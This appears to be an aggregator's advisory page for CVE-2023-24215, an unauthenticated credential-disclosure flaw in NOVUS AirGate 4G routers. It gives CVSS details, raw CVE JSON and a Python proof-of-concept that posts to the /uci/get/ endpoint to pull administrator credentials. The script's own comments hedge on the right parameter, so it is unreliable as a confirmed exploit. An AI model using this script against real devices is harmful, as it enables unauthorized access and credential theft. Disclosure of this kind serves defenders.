Security Vulnerability Report
中文
CVE-2023-24215 CVSS 9.1 CRITICAL

CVE-2023-24215

Published: 2026-05-18 18:17:20
Last Modified: 2026-05-19 15:16:26

Description

Incorrect access control in the /uci/get/ endpoint of NOVUS AirGate 4G firmware v1.1.16 allows unauthenticated attackers to obtain administrator credentials via a crafted POST request.

CVSS Details

CVSS Score
9.1
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N

Configurations (Affected Products)

No configuration data available.

NOVUS AirGate 4G v1.1.16

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests def exploit_novus_airgate(target_ip): # Target endpoint vulnerable to incorrect access control url = f"http://{target_ip}/uci/get/" # Headers to mimic a legitimate browser request headers = { "Content-Type": "application/x-www-form-urlencoded", "User-Agent": "Mozilla/5.0" } # Payload to retrieve sensitive configuration (admin credentials) # The specific parameter might vary based on UCI structure, often requesting config files like 'system' or 'admin' payload = { "config": "system" } try: # Sending POST request without authentication response = requests.post(url, headers=headers, data=payload, verify=False, timeout=5) if response.status_code == 200: print("[+] Exploit successful!") print("[+] Retrieved response:") print(response.text) else: print(f"[-] Failed. Status code: {response.status_code}") except Exception as e: print(f"[-] Error: {e}") if __name__ == "__main__": target = "192.168.1.1" # Replace with target IP exploit_novus_airgate(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2023-24215", "sourceIdentifier": "[email protected]", "published": "2026-05-18T18:17:20.053", "lastModified": "2026-05-19T15:16:25.950", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "Incorrect access control in the /uci/get/ endpoint of NOVUS AirGate 4G firmware v1.1.16 allows unauthenticated attackers to obtain administrator credentials via a crafted POST request."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 5.2}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-284"}]}], "references": [{"url": "http://airgate.com", "source": "[email protected]"}, {"url": "http://novus.com", "source": "[email protected]"}, {"url": "https://github.com/sql3t0/cve-disclosures/blob/main/00_-_CVE-2023-24215.md", "source": "[email protected]"}]}}